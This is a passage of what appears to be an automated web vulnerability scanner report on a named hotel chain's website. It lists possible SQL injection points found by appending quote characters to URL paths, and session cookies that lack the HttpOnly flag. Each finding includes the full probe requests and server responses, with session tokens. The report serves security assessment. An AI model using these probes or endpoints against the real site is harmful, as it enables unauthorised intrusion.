...[SNIP]...
1.26. http://www.redcarnationhotels.com/travel-agents/sales-representatives [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /travel-agents/sales-representatives

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /travel-agents/sales-representatives' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 02:47:35 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:47:35 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /travel-agents/sales-representatives'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 02:47:35 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:47:35 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Travel Agents Booking Area ...
...[SNIP]...
1.27. http://www.redcarnationhotels.com/travel-agents/trade-shows [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /travel-agents/trade-shows

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /travel-agents/trade-shows' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 02:47:49 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:47:49 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /travel-agents/trade-shows'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 02:47:50 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:47:50 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Travel Agents Booking Area ...
...[SNIP]...
1.28. http://www.redcarnationhotels.com/useful-links/useful-travel-links_1 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /useful-links/useful-travel-links_1

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /useful-links/useful-travel-links_1' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 03:16:25 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:16:25 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /useful-links/useful-travel-links_1'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 03:16:25 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:16:25 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Useful Links - Red Carnation Ho
...[SNIP]...
1.29. http://www.redcarnationhotels.com/your-stay/business-pleasure [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /your-stay/business-pleasure

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /your-stay/business-pleasure' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 02:52:31 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:52:31 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /your-stay/business-pleasure'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 02:52:31 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:52:31 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury hotel facilities - Bouti
...[SNIP]...
1.30. http://www.redcarnationhotels.com/your-stay/family [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /your-stay/family

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /your-stay/family' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 02:54:41 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:54:41 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /your-stay/family'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 02:54:43 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:54:43 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24115

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury hotel facilities - Bouti
...[SNIP]...
1.31. http://www.redcarnationhotels.com/your-stay/female-traveller [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /your-stay/female-traveller

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /your-stay/female-traveller' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 02:54:41 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:54:41 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /your-stay/female-traveller'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 02:54:43 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:54:43 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury hotel facilities - Bouti
...[SNIP]...
1.32. http://www.redcarnationhotels.com/your-stay/pets [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /your-stay/pets

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /your-stay/pets' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 02:54:58 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:54:58 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /your-stay/pets'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 02:54:58 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:54:58 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury hotel facilities - Bouti
...[SNIP]...
1.33. http://www.redcarnationhotels.com/your-stay/rch-video-tour [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /your-stay/rch-video-tour

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /your-stay/rch-video-tour' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 02:51:41 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:51:41 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /your-stay/rch-video-tour'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 02:51:41 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:51:41 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury hotel facilities - Bouti
...[SNIP]...
1.34. http://www.redcarnationhotels.com/your-stay/thoughtul-touches [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /your-stay/thoughtul-touches

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /your-stay/thoughtul-touches' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 02:51:52 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:51:52 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /your-stay/thoughtul-touches'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 02:51:52 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:51:52 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury hotel facilities - Bouti
...[SNIP]...
2. Cookie without HttpOnly flag set  previous  next
There are 30 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

2.1. http://www.redcarnationhotels.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.redcarnationhotels.com
Proxy-Connection: keep-alive
Referer: http://www.milestonehotel.com/contact-us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:20:50 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:20:50 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=05996081970c883254084bbef9c977de; path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 29425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Hotels, 5 Star Hotels, B
...[SNIP]...
2.2. http://www.redcarnationhotels.com/careers  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /careers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /careers HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:30:33 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:30:33 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=05f8c07acc9a296160e78cdf96650b67; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Hotel & Hospitality Careers - L
...[SNIP]...
2.3. http://www.redcarnationhotels.com/company-information/about-us  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /company-information/about-us

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /company-information/about-us HTTP/1.1
Host: www.redcarnationhotels.com
Proxy-Connection: keep-alive
Referer: http://www.redcarnationhotels.com/contact-us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utmb=187643563

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:26:38 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:26:38 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=82ce90c3c11b5efd5148ad5a7c4d51a6; path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Hotel Chains, Red Carnat
...[SNIP]...
2.4. http://www.redcarnationhotels.com/company-information/about-us/core-values  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /company-information/about-us/core-values

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /company-information/about-us/core-values HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/company-information/about-us
